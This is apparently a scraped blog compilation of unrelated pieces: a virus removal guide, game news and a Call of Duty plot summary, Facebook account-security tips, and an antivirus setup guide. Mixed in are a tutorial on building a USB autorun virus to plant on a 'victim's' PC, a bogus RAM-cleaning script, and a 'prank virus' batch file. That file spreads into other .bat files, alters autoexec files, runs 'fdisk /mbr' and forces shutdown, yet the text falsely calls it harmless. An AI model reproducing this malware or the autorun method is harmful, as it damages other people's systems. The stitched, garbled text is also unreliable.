This tutorial describes the procedure to remove autorun.inf and boot.com virus. This virus is commonly called as resycled/boot.com virus, which could damage the system files and may steal important information from the system.This can be removed by any malware / spyware remover like Malewarebytes. To remove it using Malewarebytes : 1. Reboot the system.2. On startup, press F8 before windows starts loading.3. From the menu, choose the option to boot the system in Safe Mode.4. Once the system boots up, run Malwarebytes and perform a scan. To remove this virus manually: 1. Open the Task manager by Shift + Ctrl + Esc keys2. Select the "Processes" tab. In the list of processes, select "explorer.exe" and press the button "End Process" to kill the process.3. Right click "My computer", select "Properties". In the "System Properties" window, select "System Restore" tab.4. Select "Turn off System Restore on all drives" and Press "OK".5. Open command prompt by pressing Windows + r keys, type "cmd", press "OK".6. Type the following commands one by one and press "Enter".c:cd\attrib -s -h -r autorun.infdel autorun.inf.* /s /q /fcd resycledattrib -s -h -r boot.comdel boot.com /s /q /fcd \rmdir c:\resycled /s /qexit7. Press Windows + e keys to open the explorer.8. Open the folder "C:\windows\prefetch " and delete all the files in this folder. Close the explorer window.9. Go to "System Properties" window and deselect "Turn off System Restore on all drives" to enable system restore.10. Open Registry Editor, by pressing Windows + r keys, type "regedit", press "OK".11. Search for the string "resycled\boot.com" by pressing Ctrl+F.12. If you find any occurance of this string, delete the occurances.13. Close the Registry Editor and reboot the system. The virus is cleared now.
This tutorial show you how to make an autorun virus with a USB flash drive!
plug in your USB flash drive into your pc, open my computer and open where the USB has been plugged in,Put Your Virus in Your USB now we need to right click and then goto 'New >' and click text document save it as autorun.inf now double click it or open it with notepad and type in the following :
Here Is what these Commands Do : 'open=' opens a specific file you want in your flash drive, Put Your Virus Name .exe 'action=' is what will be displayed on the autorun menu, you can name it anything really. 'label=' it will rename your flash drive to whatever is after the = 'icon=' will change the icon of the flash drive u can use a .exe icon or a .ico icon
How To Use Plug Your USB Flash Drive Into The Victims PC And Press Enter! BAM! They've Got Your Virus!
is one of the main component of computer that is responsible for the process of the operating system.
Since all the Operating systems support Multiprocessing, hence require a good RAM speed.
Since all the current running processes are stored onto the RAM, it slows the system speed. Sometimes the process which have executed but are not required by the OS are stored on the RAM. So, here is a tricks to increase your RAM speed
We can clean the RAM just by using Notepad .
yes using notepad & no need to buy any software for that
The process is as follows.
Open Notepad
Type
FreeMem=Space(64000000)
save it as “CleanRAM.vbs” on desktop
Note: Type the name of file along with inverted commas
Run the file and your RAM may be free. Of course you can edit the code in the file for a greater “cleaning-progress”. For example:
Become the bane of enemy soldiers who can’tquitetake cover properly in Sniper: Ghost Warrior 2. City Interactive will bring their CryEngine 3 powered sniper sim to PC next March. It’ll hit Europe on March 16, and the US on March 20. The in-game footage above is taken from Sniper’s Gamescom showing, and feels a lot like Call of Duty 4′s Chernobyl level, in which you spend a lot of time dressed as a bush, being told what to do by another man dressed as a bush. But imitating greenery is the second most exciting thing about being a sniper. The first is the feeling of god-like power as you hover your sights over a distant, unaware foe. Expect plenty of that come March 2012.(...)
Call of Duty: Black Opsis afirst-person shootervideo gamedeveloped byTreyarch, published byActivisionand released worldwide on November 9,2010forMicrosoft Windows,Xbox 360,PlayStation 3,andWiiconsoles,with a separate version forNintendo DSdeveloped byn-Space.[1]Announced on April 30, 2010, the game is the seventh installment of theCall of Dutyseries. It is also the first to be set in theCold Warand the fifth to be set in World War II. It is the third in the series to be developed by Treyarch, and is a sequel to the developer'sCall of Duty: World at War.
Within 24 hours of going on sale, the game sold more than 5.6 million copies, 4.2 million in the U.S. and 1.4 million in the UK, breaking the record set by its predecessorModern Warfare 2by some 2.3 million copies.A subtitled version was released in Japan on November 18, 2010. A Japanese-dubbed version was released on December 16, 2010. After six weeks on release,
Activision reported Black Ops had earned $1 billion in sales.On August 3, 2011, Activision confirmed that the game had sold over 25 million copies worldwide, making it the best-selling game of all time in the US, UK and Europe. On April 28, 2012, it was leaked that the sequel,Call of Duty: Black Ops II, will be released on November 13, 2012.
Story
On February 25, 1968, SAD/SOG operative Alex Mason is strapped to a chair in an interrogation room. Unaware of his whereabouts, he is bombarded with questions by his unseen captors about the location of anumbers station. Most of the missions in the game are presented as the flashbacks of Mason between 1961 and 1968.
In 1961, Mason, Woods, and Bowman attempt to assassinate Fidel Castro during theBay of Pigsinvasion of Cuba as a part ofOperation 40. Mason apparently succeeds in the assassination, but theirexfiltrationgoes awry, with Mason staying behind to protect the extraction plane. He is captured by the real Castro, having shot a double. Because of an alliance with theSoviet Union, Castro hands Mason over to General Nikita Dragovich. Mason is then held captive atVorkuta Gulagfor two years. During his imprisonment, Mason befriends Viktor Reznov, a formerRed Armysoldier. Reznov recounts to Mason the identities of those involved in Mason’s torture: Dragovich, Lev Kravchenko (his right-hand man) and Friedrich Steiner, an ex-Naziscientist who defected to the Soviet Union. All three share a connection to Reznov: in October 1945, Reznov, Dragovich, Kravchenko, and Dimitri Petrenko were a part of a unit sent to locate Steiner, hiding with a unit of the SS in theArctic Circle. During the operation, Reznov was betrayed by Dragovich, who used Steiner's creation, anerve agentknown as "Nova-6" on Petrenko. Reznov was spared the same fate whenBritish commandosattacked the Russians. During the confusion, he destroys Nova-6. However, it was later recreated by Steiner and a British scientist named Daniel Clarke for the Soviets. Shortly afterward, Reznov is imprisoned in Vorkuta. Mason and Reznov spark a prisoner uprising to escape the gulag, but only Mason escapes.
One month later, President John F. Kennedy authorizes the assassination of Dragovich.
In November 1963, Mason, Woods, Bowman and Weaver are dispatched toBaikonur Cosmodromein theKazakh SSRto disrupt theSoviet space programand eliminate members of the Soviet Ascension program, Nazis who had been given sanctuary in Russia in exchange for their knowledge. At the start of the operation, Weaver is captured and Mason sees Kravchenko torture him, stabbing his left eye, but Mason and his team later rescue him, while still destroying theSoyuzspacecraft as well. Dragovich eludes assassination, prompting Mason to search for him over the next five years. By 1968, theMACV-SOGwas established inVietnamto investigate the Soviets' presence. Afterdefending Khe Sanh, the SOG is deployed toHueduring theTet Offensiveto recover a dossier with information on Dragovich from a Russian defector. The team recovers the dossier, while Mason encounters Reznov, who is revealed to be the defector. The SOG then penetratesLaosto recover a Nova-6 shipment from a downed Soviet plane. At the crash site, they are overwhelmed by waves of Viet Cong and Spetznaz soldiers, eventually getting captured. Mason and Reznov escape, but Bowman is executed and Woods dies while killing Kravchenko.
Meanwhile, Hudson and Weaver interrogate Dr. Daniel Clarke, the engineer who stabilized Nova-6, inKowloon. Clarke identifies Steiner as part of the conspiracy, and reveals the location of a hidden facility inMount Yamantaubefore being killed by Dragovich's men. Hudson and Weaver head to Mount Yamantau to destroy the facility and apprehend Steiner. During the mission, Hudson receives a transmission from Steiner requesting to meet him atRebirth Islandin theAral Seato learn how to halt anumbers broadcastthat would send instructions to sleeper agents to release Nova-6 gas in American cities. Mason and Reznov head to Rebirth Island to assassinate Steiner. In the present, Mason is adamant that Reznov executed Steiner, but Hudson had witnessed Mason carrying out the deed. At this point, Hudson and Weaver are revealed as Mason's interrogators. Hudson realizes that Dragovich brainwashed Mason to understand the numbers broadcasts, effectively becoming a Sovietsleeper agent. Out of options, Hudson deliberately sets Mason free in order to follow him. It is revealed that the real Reznov died during the Vorkuta break out, and Mason’s visions of Reznov are a result of adissociative disordercaused by the traumatic brainwashing program. Reznov had, in fact, reprogrammed Mason to assassinate Dragovich, Kravchenko and Steiner instead of President Kennedy prior to the Vorkuta breakout. Hudson plays the numbers recording for Mason a final time, prompting him to remember the location of the Russian cargo shipRusalkaoff the coast of Cuba.
By dawn, the team launches an assault on theRusalka, with Mason and Hudson infiltrating an underwater broadcast station protected by the ship, a Soviet submarine station intended to be used as a staging point for US invasion after the planned Nova-6 attack. Confirming that theRusalkais the numbers station, Hudson calls in theUS Navyto destroy the ship and its underwater base. Mason and Hudson finally find Dragovich in the lower levels of the facility and manage to kill him before the destruction of the base, swimming for the surface during the destruction of the targets. Weaver declares victory, but Mason is unsure, haunted by his last conversation with Dragovich.
Archive footage of President Kennedy prior to his assassination are shown, with the broadcaster and Mason narrating random numbers. After a second play-through of the archive footage, Mason's appearance in the crowd, as well as Dragovich's final words, suggest that Masonfollowed his original programming.
Hey Guys I am here With a Small Tutorial On How to create a virus. By using This trick You Can Easily Prank Your Friends
First Of lemme Start With Telling You
What Is A Virus?
A computer virus is a computer program that can copy itself and infect a computer. The term “virus” is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.(Source Wikipedia)
As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan is a program that appears harmless but hides malicious functions. Worms and Trojans, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious and go unnoticed.(Source Wikipedia)
Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.
@echo off title %0 rem conditional check. echo welcome to this wonderful program! please wait while I delete all your files! rem infection of the user copy %0 c:tmp.bat >null attrib +r +s +h c:tmp.bat echo for %%i in (*.bat) do copy c:tmp.bat+%%i %%i >>c:windowssystem32autoexec.NT echo echo virus detected! >>c:windowssystem32autoexec.NT echo pause >>c:windowssystem32autoexec.NT echo NT core:infected! echo echo shame on you! >>c:autoexec.bat echo echo system hault-virus identified! >>c:autoexec.bat echo chkdsk >>c:autoexec.bat echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l fdisk /mbr shutdown -s -t 03 -c “windows has shut down because the lsass service has incountered a write fault at 0×00000000000000000000000000000000000″
Code Details
@echo off color 1a (Changes the colour) echo (Displays a text) echo: (leaves a line) ping -n 2 127.0.0.1>nul (pings your localhost – nothing much) shutdown.exe (shutdown)
Preparing the Virus
Read and understand the warnings!
Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.
Copy and Paste the Code of the “virus” into Notepad
Click File -> Save as
Decide for a location to save the fake-virus. You should chose a location where the user won’t find the file, so saving it on the desktop would be a bad idea!
Change “.txt” to “All files” in the file type drop-down menu
Chose a harmless filename. Replace the “.txt” at the with “.bat”
MissPhedora writes: Someone has gotten into my Facebook and deleted or changed my information (not good) and changed my password. I can not access it and it does not sent me a code (obviously they also changed my alternative email address). I want to lock my Facebook down or close it. How do I do that?
Hi MissPhedora—and sorry to hear about your Facebook troubles. The good news is that there is a way to get your stolen Facebook account back, even if the crooks have changed your password and the email addresses associated with your account.
The first step is to prove to Facebook that you are, in fact, you. Visit this page, where you’ll get three options: submitting a phone number or email address that is (or once was) associated with your Facebook account; entering your Facebook username; or entering your name and the name of one of your Facebook friends.
Once you’ve identified your compromised account, you’ll arrive at a page with a series of contact numbers and email addresses. If you still have control of any of the email address or phone numbers that are listed, check the appropriate box and click the “Reset Password” button.
If that doesn’t work, click the “No longer have access to these?” link, and Facebook will step you through the (often lengthy) process of confirming your identity.
In addition to answering standard security questions (“What was the name of a childhood pet?” and the like), you may also get the option of choosing three to five “trusted friends” who will receive special codes for reclaiming your account. To get the codes, you’ll have to call your pals on the phone—an added level of security to thwart hackers trying to worm their way into your account.
Some lucky Facebook users can even designate their “trusted friends” in advance by clicking the little arrow in the top-right corner of the page, selecting “Account Settings,” and clicking the “Edit” link in the “Trusted Friends” section.
Not all Facebook accounts have this feature enabled, though; mine doesn’t, for example. (Don’t ask me why.) That said, you can always add additional contact emails and phone numbers, or establish a security question; just click here to get started.
Hope this helps, MissPhedora, and best of luck getting your account back.
The first step in keeping your Facebook account safe and secure is one that also applies to any of your personal online accounts: creating a password that’s a little tougher to crack than “password.”
The tech gurus as Microsoft recommend creating a password that’s no less than eight characters, complete with letters, numbers, symbols and punctuation. You should also avoid using easy-to-guess words—like, say, your daughter’s first name, or the name of your beloved Labrador.
And not only should you use a unique passwords for all your online accounts, including Facebook, you should also change your passwords as often as you can stand.
And not only should you use a unique passwords for all your online accounts, including Facebook, you should also change your passwords as often as you can stand.
Not the easiest advice to follow, I know; indeed, I’d be lying if I told you I change my Facebook password once a week. But going with a password more complex than “myname99″ is, at the very least, a good start.
The good news is that you can browse Facebook over a “secure” web connection that’s far tougher (though not impossible) for hackers to crack. Here’s how to do it:
Click the downward arrow in the top-right corner of any Facebook page, then select Account Settings.
In the left column of the next page, click Secutiry, then click the “edit” link next to Secure Browsing.
Click the “Browse Facebook on a secure connection (https) when possible)” checkbox.
Now, when you check your Facebook account, you’ll see “https://” (rather than plain-old “http://”) at the beginning of your web browser’s address bar, which means you’re browsing the web over a (mostly) secure connection.
3. Turn on login notifications
Even the strongest of strong passwords and “secure browsing” won’t stop a determined hacker from sneaking into your Facebook account, and that’s where this next security precaution comes in handy.
You can set Facebook to warn you whenever someone logs into your account from an “unrecognized” device—that is, something other than the laptop, phone, or desktop PC that you use for Facebook each day.
You can set Facebook to warn you whenever someone logs into your account from an “unrecognized” device—that is, something other than the laptop, phone, or desktop PC that you use for Facebook each day.
Here’s how:
Click the downward arrow in the top-right corner of any Facebook page, click Account Settings, then click Security in the left column.
Next, click the Edit link next to Login Notifications. Once you enable this setting, you’ll get a warning if someone tries to log into your Facebook account over a new device. All you have to do is choose how you’d like to be notified: via email or text message (provided you’veregistered your cell phone number with Facebook).
Finally, click the Save Changes button. You’re done.
From now on, you’ll be prompted to name any device you use to log into Facebook, and you’ll be able to track your “recognized” Facebook devices from the Security Settings page.
4. Turn on login approvals
While login notifications do a great job of warning you if someone’s trying to pry their way into your Facebook account, they won’t actually stop anyone from breaking in if they’ve managed to snag your Facebook password. That’s where login approvals come in.
Here’s how they work: whenever anyone—either you or someone else—tries to log into your Facebook account on an “unrecognized” device, they’ll have to enter a secret, one-use-only code that’s sent via SMS to your cell phone. No code, no entry.
It’s a clever way to keep ne’er-do-wells from trying to pry their way into your Facebook account; then again, it can backfire if you’re trying to log into Facebook from a new PC and you don’t have your cell phone, or if your cellular connection conks out.
Still want to try login approvals? Here’s how:
Once again, click the downward arrow in the top-right corner of a Facebook page, click Security in the left column, then click the “Edit” link next to Login Approvals.
Click the “Require me to enter a security code” checkbox, then follow the prompts.
Part of the setup process involves Facebook sending an initial security code to the cell phone number you’ve registered on your Facebook account (and yes, you’ll be prompted to register a wireless number if you haven’t done so already).
That’s it! Just make sure to keep your phone handy if you’re planning on logging into Facebook from a device you haven’t used before.
Change your mind about login approvals? If so, just go back to the Security Settings page (under Account Settings), click the Edit link next to Login Approvals, clear the checkbox, and click Save Changes.
You can check—and immediately log out of—any remote Facebook sessions that still happen to be open.
5. Sign out of any “remote” Facebook sessions
Ever worry that you signed in to Facebook on a friend’s computer or a PC in a conference room but forgot to sign out? I know the feeling. Luckly, it’s easy to log out of any so-called “remote” Facebook sessions, even when you’re sitting at home in front of your personal desktop.
Go to the Security Sessions: click the downward arrow in the top-right corner of any Facebook page, click Account Settings, then click Security in the left column.
Click the Edit link next to Active Sessions, then take a look at the list of your recent “sessions” that Facebook thinks are still active.
See any you don’t recognize—or, perhaps, one from a public PC that you do recognize? If so, click the “End Activity” link next to the session in immediately log out of it.
hello my friends,today i brought a new trick to make afraid your friend.This is a funny virus.but this is not a true virus.only a funny.this work can afraid your friend with a warning massage. we stop our talking.going work.
How to protect your Windows PC from viruses, for free
You know the web is rife with viruses, Trojans, and other nasty bits of malware, but for whatever reason, you’ve yet to install virus protection on your PC. (Hey, I’ve been there.)
Well, here’s the thing: sticking our heads in the sand and hoping for the best isn’t an effective deterrent to the latest viruses and spyware.
Well, here’s the thing: sticking our heads in the sand and hoping for the best isn’t an effective deterrent to the latest viruses and spyware.
The good news is that with a few clicks, you can have virus protection up and running on your Windows system in about five minutes—and it won’t cost you a dime.
Microsoft’s free Security Essentials package has, naturally enough, drawn fire from for-pay competitors like Symantec (maker of Norton Antivirus) and Trend Micro (Online Guardian) for its “basic” and “average” virus protection, while some recent reviews have faulted the software for being “a bit light in the toolbelt.”
Well, maybe so. But for those of us who aren’t security experts but want a solid, low-maintenance shield against viruses and other malware, Security Essentials remains a fast, easy way to buttress your PC’s defenses—and at the very least, it’s better than nothing.
Visit Microsoft’s Security Essentals website to download the software, which works on PCs with Windows XP or better installed. (If your bought your Windows desktop or laptop within the last decade, you should be fine.)
Once installed, the Security Essentials control panel will appear, complete with tabs for updating your antivirus definitions (a continually updated database of the latest online threats) and running quick or full sweeps of your PC’s hard drive.
You can set Microsoft Security Essentials to automatically scan your system on a weekly basis.
Your first step should be to perform a full system scan. Click the Home tab, then select “Full” under “Scan options,” and click the big “Scan now” button. A full virus scan of your PC could take awhile—maybe an hour or more—but at least you’ll be able to do other things while Security Essentials scours your hard drive.
After you’ve completed your first scan, go ahead and click “Quick” under “Scan options” for your future scans, then click the Settings tab to set a schedule for regular virus checks.
Last but not least, keep an eye on the security icon in your system tray (located in the lower-right corner of the screen). If the little fortress icon with the flag on top is green, you’re good; if not, right-click it to perform any necessary updates.